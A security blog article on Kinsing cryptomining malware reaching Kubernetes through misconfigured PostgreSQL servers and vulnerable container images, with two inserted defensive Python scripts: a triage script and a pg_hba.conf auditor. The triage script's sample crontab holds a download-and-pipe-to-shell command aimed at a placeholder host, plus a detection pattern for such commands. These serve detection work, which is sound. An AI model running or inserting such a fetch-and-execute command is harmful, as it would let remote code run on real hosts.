
Kubernetes Clusters Hacked:
What You Need To Know

 


Author: Eva Georgieva / Last Updated: 01/13/2022

Reviewed By: Dalibor Gašić


Summary Of The Attack

 

  • Kinsing malware is targeting Kubernetes clusters.
  • Two paths of exploitation are used: vulnerable container images and misconfigured PostgreSQL servers.
  • The motive is cryptocurrency mining, which generates revenue for the attackers.
  • Securing Kubernetes clusters is tedious work, but it has to be done.

 

What Happened?

 

To gain initial access to Kubernetes environments, the threat actors behind the Kinsing cryptojacking operation have been observed taking advantage of exposed and improperly configured PostgreSQL servers.

What Is Kinsing?

 

Kinsing is malware written in Go (Golang), a high-level programming language widely used for building cloud-native applications.

The samples analyzed were compiled with Go 1.13.6.

The malware mainly targets Linux environments and is used for cryptocurrency mining. Once installed and running on a victim host, it also attempts to spread to other machines.


The Anatomy Of The Attack

 

Security researchers at Microsoft analyzed the attack and identified two attack paths.

The first attack path starts by scanning for and enumerating PostgreSQL servers with configuration issues.

The most common misconfiguration being exploited is the "trust" authentication method, which tells PostgreSQL to assume that any connection matching the rule is already authorized, so no password is required to access the database.

The second common mistake is granting access to an overly broad range of IP addresses (for example a rule covering 0.0.0.0/0), so that a connection from any address, including the attacker's, matches an allow rule and reaches the server.

 

The second attack path exploits vulnerable container images.

Here the attackers look for images running an application with a known remote code execution vulnerability, exploit it to drop their payload, and gain a foothold in the container that way.

So far, the attackers have been seen scanning for vulnerable versions of these applications:

 

  • WordPress
  • Liferay
  • PHPUnit
  • Oracle WebLogic

Why Kinsing Malware?

 

Kinsing already has a long track record of compromising containerized environments to mine cryptocurrency. The main goal is revenue: the threat actors consume the victim server's hardware resources to mine coins for themselves.


Kinsing On PostgreSQL: Case Study

 

A useful reference here is Sreeram Venkitesh, who described how he detected Kinsing on a PostgreSQL server and what he did to remove it.

The first indicator of compromise was the PostgreSQL database suddenly becoming unavailable: with no obvious cause, the CPU cores were at 100% usage, and PostgreSQL could no longer be reached.

Reviewing the process list showed a process named kinsing. Killing it alone did not get rid of it, because the malware adds a cron job that re-downloads and restarts it.

The final step was finding all of the malicious processes, killing them and deleting their files from the /tmp directory, and removing the cron jobs.

This is a representative case of successful Kinsing remediation.
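The triage from the case study, written up as a script. This is an added example, not code from the article or from Sreeram Venkitesh's write-up. It works on captured `ps` output and crontab text rather than the live host, so it runs offline; both captures are constructed, the `miner` process name and the download URL in the cron line are placeholders, and the CPU threshold is an assumption. The checks mirror the three observations above: a process named `kinsing` pegging the CPU, a cron job that re-installs it, and binaries dropped under /tmp. The output is an operator's plan; nothing here changes the host.

```python
"""Triage captured host state for the Kinsing indicators in the case study.

Added example, not code from the article or from the case study's author.
Operates on captured ``ps`` output and crontab text (constructed samples
below); produces a clean-up plan, never modifies the host.
"""
import os
import re

# Constructed capture of `ps -eo pid,user,pcpu,comm,args`.
PS_OUTPUT = """\
  PID USER     %CPU COMMAND  COMMAND
    1 root      0.0 systemd  /sbin/init
  812 postgres  0.3 postgres postgres: checkpointer
 2301 postgres 99.7 kinsing  /tmp/kinsing
 2310 postgres 97.2 miner    /tmp/.x/miner
 2455 root      0.0 sshd     sshd: /usr/sbin/sshd -D
"""

# Constructed capture of `crontab -l` for the postgres user; the URL is a
# placeholder (.invalid is a reserved TLD), not real Kinsing infrastructure.
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/vacuumdb --all --analyze
* * * * * wget -q -O - http://malware.example.invalid/pg.sh | sh > /dev/null 2>&1
"""

KNOWN_NAMES = {"kinsing"}                            # process name from the case study
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # where the binaries were dropped
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")  # download-and-pipe-to-shell


def parse_ps(text):
    """Parse `ps -eo pid,user,pcpu,comm,args` output into dicts (header skipped)."""
    procs = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 4)
        if len(parts) < 5:
            continue
        pid, user, pcpu, comm, args = parts
        procs.append({"pid": int(pid), "user": user, "pcpu": float(pcpu),
                      "comm": comm, "args": args})
    return procs


def suspicious_processes(procs, cpu_threshold=90.0):
    """Return (proc, reasons) for processes matching a Kinsing indicator.

    CPU usage alone is not an indicator (a busy PostgreSQL also hits 100%);
    it is only reported alongside a name or path match.
    """
    hits = []
    for p in procs:
        exe = p["args"].split()[0]
        reasons = []
        if p["comm"] in KNOWN_NAMES or os.path.basename(exe) in KNOWN_NAMES:
            reasons.append("known Kinsing process name")
        if exe.startswith(WRITABLE_DIRS):
            reasons.append(f"executable runs from world-writable dir: {exe}")
        if reasons and p["pcpu"] >= cpu_threshold:
            reasons.append(f"pegging CPU at {p['pcpu']}%")
        if reasons:
            hits.append((p, reasons))
    return hits


def suspicious_cron_lines(text):
    """Return crontab lines that fetch-and-pipe to a shell or run from /tmp."""
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):            # @reboot, @hourly, ...: one time field
            parts, needed = line.split(None, 1), 2
        else:                               # five time fields then the command
            parts, needed = line.split(None, 5), 6
        if len(parts) < needed:
            continue
        cmd = parts[-1]
        if (FETCH_AND_RUN.search(cmd) or cmd.startswith(WRITABLE_DIRS)
                or any(n in cmd for n in KNOWN_NAMES)):
            hits.append(line)
    return hits


def remediation_plan(ps_text, crontab_text):
    """Build the ordered clean-up the case study arrived at.

    Cron entries come first: killing the miner while the cron job survives
    just gets it re-downloaded a minute later.
    """
    procs = suspicious_processes(parse_ps(ps_text))
    return {
        "remove_cron_lines": suspicious_cron_lines(crontab_text),
        "kill_pids": sorted(p["pid"] for p, _ in procs),
        "remove_files": sorted({p["args"].split()[0] for p, _ in procs
                                if p["args"].startswith(WRITABLE_DIRS)}),
        "reasons": {p["pid"]: r for p, r in procs},
    }


if __name__ == "__main__":
    plan = remediation_plan(PS_OUTPUT, CRONTAB)
    for step in ("remove_cron_lines", "kill_pids", "remove_files"):
        print(f"{step}: {plan[step]}")
```

Two caveats when running this against a real host: `ps` truncates the `comm` column to 15 characters, so the match on `args` matters for longer names, and the user's crontab is only one persistence location; also capture `/etc/cron.d`, `/etc/cron.*` and `/var/spool/cron` before deciding the cleanup is complete.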

How Can This Attack Be Prevented?

 

When it comes to closing the exploit path through misconfigured PostgreSQL servers, the best practices include:

  • Removing trust authentication
  • Hardening network access to the database
  • Removing default users and overly broad permissions

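An audit script for the first two practices above, covering the same two misconfigurations described in the anatomy of the attack (the "trust" method and an overly broad address range). This is an added example, not code from the article or from PurpleSec. It parses a pg_hba.conf, flags every `trust` rule and every rule whose address range admits more hosts than a /24; both configurations it checks are constructed samples, and the /24 threshold is an assumption for this example.

```python
"""Audit a PostgreSQL pg_hba.conf for trust authentication and over-broad ranges.

Added example, not code from the article or from PurpleSec. The two
configurations below are constructed samples; MAX_HOSTS is an assumption.
"""
import ipaddress

# Any rule admitting more hosts than a /24 (256 addresses) is reported.
MAX_HOSTS = 256

# Constructed weak configuration: trust everywhere and a 0.0.0.0/0 range.
WEAK_PG_HBA = """\
# TYPE  DATABASE  USER  ADDRESS        METHOD
local   all       all                  trust
host    all       all   127.0.0.1/32   trust
host    all       all   0.0.0.0/0      trust
host    all       all   ::/0           md5
"""

# Constructed hardened configuration: OS-user peer auth for local sockets,
# SCRAM over TLS elsewhere, addresses limited to the application subnet.
HARDENED_PG_HBA = """\
# TYPE     DATABASE  USER    ADDRESS         METHOD
local      all       all                     peer
hostssl    app_db    app_rw  10.42.7.0/24    scram-sha-256
hostssl    app_db    app_ro  10.42.7.15/32   scram-sha-256
"""


def parse_pg_hba(text):
    """Return (type, database, user, address, method) per rule line.

    ``local`` rules have no ADDRESS column. Comments, blank lines and the
    optional trailing auth-options are ignored. Only the CIDR address form is
    parsed; the two-column "IP NETMASK" form ends up as an unknown address.
    """
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        f = line.split()
        if f[0] == "local" and len(f) >= 4:
            rules.append((f[0], f[1], f[2], None, f[3]))
        elif f[0] != "local" and len(f) >= 5:
            rules.append((f[0], f[1], f[2], f[3], f[4]))
    return rules


def hosts_admitted(address):
    """Number of addresses the ADDRESS column matches, or None if unknown."""
    if address == "all":
        return float("inf")      # keyword: every address
    if address == "samehost":
        return 1                 # keyword: the server's own addresses
    try:
        return ipaddress.ip_network(address, strict=False).num_addresses
    except ValueError:
        return None              # hostname, samenet, or IP NETMASK form


def audit_pg_hba(text, max_hosts=MAX_HOSTS):
    """Return a list of (rule_no, kind, detail) findings for the config."""
    findings = []
    for n, (typ, db, user, address, method) in enumerate(parse_pg_hba(text), 1):
        rule = " ".join(x for x in (typ, db, user, address, method) if x)
        if method == "trust":
            findings.append((n, "trust", f"no authentication at all: {rule}"))
        if address is not None:
            hosts = hosts_admitted(address)
            if hosts is not None and hosts > max_hosts:
                findings.append((n, "broad-address",
                                 f"admits {hosts} addresses: {rule}"))
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_PG_HBA), ("hardened", HARDENED_PG_HBA)):
        found = audit_pg_hba(conf)
        print(f"{name}: {len(found)} finding(s)")
        for n, kind, detail in found:
            print(f"  rule {n} [{kind}] {detail}")
```

Rule order matters in pg_hba.conf: PostgreSQL uses the first matching line, so a broad `trust` rule near the top shadows every stricter rule below it. Treat a "trust" finding on any non-loopback range as the priority fix, then narrow the address columns to the subnets that actually need access.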
 

Securing the container images, on the other hand, should include:

  • Pulling container images only from known, trusted registries
  • Scanning images for vulnerabilities regularly and keeping them up to date
  • Hardening network access to the system
  • Patching services promptly so that vulnerable versions are not running on your system

 

The official Kubernetes documentation offers a thorough, well-written guide on securing a cluster.

 


Eva Georgieva

Eva is a security engineer, researcher, and penetration tester with over 5 years of experience working on both red teams and blue teams.
